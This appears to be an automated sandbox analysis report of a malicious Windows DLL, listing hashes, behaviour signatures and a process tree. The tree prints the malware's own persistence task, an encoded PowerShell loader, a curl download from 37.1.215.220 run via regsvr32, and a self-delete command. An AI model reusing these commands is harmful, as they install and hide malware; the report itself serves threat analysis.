Analysis
-
max time kernel
367s -
max time network
340s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
07/02/2023, 14:13
Static task
static1
Behavioral task
behavioral1
Sample
wbroidpyUsiqfHRGEXoN-Q4oViHeNp9anCBKxWYrEd0.dll
Resource
win10v2004-20220812-en
General
-
Target
wbroidpyUsiqfHRGEXoN-Q4oViHeNp9anCBKxWYrEd0.dll
-
Size
143KB
-
MD5
920625c516d7184fed4610279dd6c164
-
SHA1
6e1fc17dd3965d707a29f0ca2ad01f693fe506b6
-
SHA256
c1bae889da7252c8aa7c7446117a0dfd0e285621de369f5a9c204ac5662b11dd
-
SHA512
3a6b0b7bb654384699f06db91f8bc287be128f6dc57e6fb2d19129d2557e04f311b6201a8783483790751645c0df8d702265bed7d09380019d09ceee74052058
-
SSDEEP
3072:8uZ6hcvJTZ9oVFBfnIyht8vPs1XQHBC92ePuH:dTN4HBnI2t8vPLu6
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2404 created 2704 2404 regsvr32.exe 29 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ regsvr32.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ WWAHost.exe -
Loads dropped DLL 1 IoCs
pid Process 2404 regsvr32.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\taskschd.msc mmc.exe File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2404 set thread context of 1544 2404 regsvr32.exe 132 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1408 schtasks.exe -
Modifies registry class 49 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656} regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0c00000050000000a66a63283d95d211b5d600c04fd918d00b0000007800000030f125b7ef471a10a5f102608c9eebac0e00000090000000 regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlot = "2" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2" regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" regedit.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell regedit.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags regedit.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1300 notepad.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1800 PING.EXE 2284 PING.EXE -
Runs regedit.exe 1 IoCs
pid Process 4748 regedit.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4928 powershell.exe 4928 powershell.exe 2264 powershell.exe 2264 powershell.exe 2264 powershell.exe 2264 powershell.exe 2404 regsvr32.exe 2404 regsvr32.exe 1544 WWAHost.exe 1544 WWAHost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4748 regedit.exe 4296 mmc.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
pid Process 2404 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe Token: 33 4296 mmc.exe Token: SeIncBasePriorityPrivilege 4296 mmc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4748 regedit.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4748 regedit.exe 4748 regedit.exe 4296 mmc.exe 4296 mmc.exe 4296 mmc.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 380 wrote to memory of 4296 380 regsvr32.exe 81 PID 380 wrote to memory of 4296 380 regsvr32.exe 81 PID 380 wrote to memory of 4296 380 regsvr32.exe 81 PID 4296 wrote to memory of 1408 4296 regsvr32.exe 82 PID 4296 wrote to memory of 1408 4296 regsvr32.exe 82 PID 4296 wrote to memory of 1408 4296 regsvr32.exe 82 PID 4296 wrote to memory of 808 4296 regsvr32.exe 83 PID 4296 wrote to memory of 808 4296 regsvr32.exe 83 PID 4296 wrote to memory of 808 4296 regsvr32.exe 83 PID 808 wrote to memory of 1800 808 cmd.exe 86 PID 808 wrote to memory of 1800 808 cmd.exe 86 PID 808 wrote to memory of 1800 808 cmd.exe 86 PID 884 wrote to memory of 4928 884 cmd.EXE 118 PID 884 wrote to memory of 4928 884 cmd.EXE 118 PID 4928 wrote to memory of 2264 4928 powershell.exe 120 PID 4928 wrote to memory of 2264 4928 powershell.exe 120 PID 2264 wrote to memory of 2076 2264 powershell.exe 121 PID 2264 wrote to memory of 2076 2264 powershell.exe 121 PID 2264 wrote to memory of 2292 2264 powershell.exe 124 PID 2264 wrote to memory of 2292 2264 powershell.exe 124 PID 2292 wrote to memory of 2404 2292 regsvr32.exe 125 PID 2292 wrote to memory of 2404 2292 regsvr32.exe 125 PID 2292 wrote to memory of 2404 2292 regsvr32.exe 125 PID 2404 wrote to memory of 1544 2404 regsvr32.exe 132 PID 2404 wrote to memory of 1544 2404 regsvr32.exe 132 PID 2404 wrote to memory of 1544 2404 regsvr32.exe 132 PID 2404 wrote to memory of 1544 2404 regsvr32.exe 132 PID 2404 wrote to memory of 1544 2404 regsvr32.exe 132 PID 2404 wrote to memory of 1544 2404 regsvr32.exe 132 PID 2404 wrote to memory of 1544 2404 regsvr32.exe 132 PID 2404 wrote to memory of 1544 2404 regsvr32.exe 132 PID 2404 wrote to memory of 1544 2404 regsvr32.exe 132 PID 1544 wrote to memory of 4732 1544 WWAHost.exe 133 PID 1544 wrote to memory of 4732 1544 WWAHost.exe 133 PID 1544 wrote to memory of 4732 1544 WWAHost.exe 133 PID 4732 wrote to memory of 2284 4732 cmd.exe 135 PID 4732 wrote to memory of 2284 4732 cmd.exe 135 PID 4732 wrote to memory of 2284 4732 cmd.exe 135
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2704
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\wbroidpyUsiqfHRGEXoN-Q4oViHeNp9anCBKxWYrEd0.dll2⤵
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\wbroidpyUsiqfHRGEXoN-Q4oViHeNp9anCBKxWYrEd0.dll3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /F /TN "{8B30B3CD-2068-4F75-AB1F-FCAE6AF928B6}" /TR " cmd /q /c start /min \"\" powershell \"$nonresistantOutlivesDictatorial = Get-ItemProperty -Path HKCU:\Software\nonresistantOutlivesDictatorial; powershell -encodedcommand $nonresistantOutlivesDictatorial.AphroniaHaimavati \"" /SC MINUTE /MO 134⤵
- Creates scheduled task(s)
PID:1408
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C "ping localhost && DEL /F /S /Q /A "4⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\SysWOW64\PING.EXEping localhost5⤵
- Runs ping.exe
PID:1800
-
-
-
-
-
C:\Windows\regedit.exe"C:\Windows\regedit.exe"2⤵
- Modifies registry class
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4748
-
-
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe" "C:\Users\Admin\Desktop\reg.reg"2⤵
- Opens file in notepad (likely ransom note)
PID:1300
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s2⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4296
-
-
C:\Windows\SysWOW64\WWAHost.exe"C:\Windows\System32\WWAHost.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\SysWOW64\cmd.execmd.exe /C "ping localhost && copy /b /y %SystemRoot%\System32\ActivationManager.dll %appdata%\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll"3⤵
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\SysWOW64\PING.EXEping localhost4⤵
- Runs ping.exe
PID:2284
-
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /q /c start /min "" powershell "$nonresistantOutlivesDictatorial = Get-ItemProperty -Path HKCU:\Software\nonresistantOutlivesDictatorial; powershell -encodedcommand $nonresistantOutlivesDictatorial.AphroniaHaimavati "1⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$nonresistantOutlivesDictatorial = Get-ItemProperty -Path HKCU:\Software\nonresistantOutlivesDictatorial; powershell -encodedcommand $nonresistantOutlivesDictatorial.AphroniaHaimavati "2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand JABuAG8AbgByAGUAcwBpAHMAdABhAG4AdABPAHUAdABsAGkAdgBlAHMARABpAGMAdABhAHQAbwByAGkAYQBsACAAPQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAGkAYwByAG8AcwBvAGYAdABcAG4AbwBuAHIAZQBzAGkAcwB0AGEAbgB0AE8AdQB0AGwAaQB2AGUAcwBEAGkAYwB0AGEAdABvAHIAaQBhAGwAXABBAHAAaAByAG8AbgBpAGEASABhAGkAbQBhAHYAYQB0AGkALgBkAGwAbAAiADsAbQBkACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAGkAYwByAG8AcwBvAGYAdABcAG4AbwBuAHIAZQBzAGkAcwB0AGEAbgB0AE8AdQB0AGwAaQB2AGUAcwBEAGkAYwB0AGEAdABvAHIAaQBhAGwAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKABHAGUAdAAtAEMAbwBtAG0AYQBuAGQAIABjAHUAcgBsAC4AZQB4AGUAKQAuAFMAbwB1AHIAYwBlACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAC0AdQByAGwAIABoAHQAdABwAHMAOgAvAC8AMwA3AC4AMQAuADIAMQA1AC4AMgAyADAALwBtAGUAcwBzAGEAZwBlAHMALwBEAEIAYwBCADYAcQA5AFMATQA2ACAALQBYACAAUABPAFMAVAAgAC0ALQBpAG4AcwBlAGMAdQByAGUAIAAtAC0AbwB1AHQAcAB1AHQAIAAnACwAIAAkAG4AbwBuAHIAZQBzAGkAcwB0AGEAbgB0AE8AdQB0AGwAaQB2AGUAcwBEAGkAYwB0AGEAdABvAHIAaQBhAGwAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADAAOwAkAHUAbgBnAGkAYQBuAHQARAB3AGEAcgBmAGUAcwB0ACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATQBpAGMAcgBvAHMAbwBmAHQAXABuAG8AbgByAGUAcwBpAHMAdABhAG4AdABPAHUAdABsAGkAdgBlAHMARABpAGMAdABhAHQAbwByAGkAYQBsAFwAQQBwAGgAcgBvAG4AaQBhAEgAYQBpAG0AYQB2AGEAdABpAC4AZABsAGwAIAB8ACAAJQB7AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABfACkAfQA7AFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATQBpAGMAcgBvAHMAbwBmAHQAXABuAG8AbgByAGUAcwBpAHMAdABhAG4AdABPAHUAdABsAGkAdgBlAHMARABpAGMAdABhAHQAbwByAGkAYQBsAFwAQQBwAGgAcgBvAG4AaQBhAEgAYQBpAG0AYQB2AGEAdABpAC4AZABsAGwAIAAtAFYAYQBsAHUAZQAgACQAdQBuAGcAaQBhAG4AdABEAHcAYQByAGYAZQBzAHQAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUAOwByAGUAZwBzAHYAcgAzADIAIAAvAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAbgBvAG4AcgBlAHMAaQBzAHQAYQBuAHQATwB1AHQAbABpAHYAZQBzAEQAaQBjAHQAYQB0AG8AcgBpAGEAbABcAEEAcABoAHIAbwBuAGkAYQBIAGEAaQBtAGEAdgBhAHQAaQAuAGQAbABsADsA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" --url https://37.1.215.220/messages/DBcB6q9SM6 -X POST --insecure --output C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll4⤵PID:2076
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll4⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:2404
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
1.4MB
MD56e377c08962a165f90e3b7462dc99fa0
SHA17db3f47b591b1f8b1276b14140ff77257fcaa286
SHA256d4756faf2fec6ff50903d239dfc28a4f534c4e28099ccadf136b52eee9e13e68
SHA51270fc5c6cf2c757c93ca7dd33d20327139fddd15803cda0d4f2cbc673fa5431a96275ba9ece82377e823b76e7becabf1cc63b593a1752124dcd6e8fedf5696542
-
Filesize
1.0MB
MD546808efd5331489a931e51792623caca
SHA11e7e75bcee397e9c447edb7a7a20a5c81eee8a87
SHA25659f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1
SHA51233fcf014dba7718a7e99a4860854b6067e525c8e1ab187dd9468fd4913fe7fe450b89beb5c915e424288857ce6137f96ef970d26b9bd061991d1d6a97e63b853
-
Filesize
1.0MB
MD546808efd5331489a931e51792623caca
SHA11e7e75bcee397e9c447edb7a7a20a5c81eee8a87
SHA25659f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1
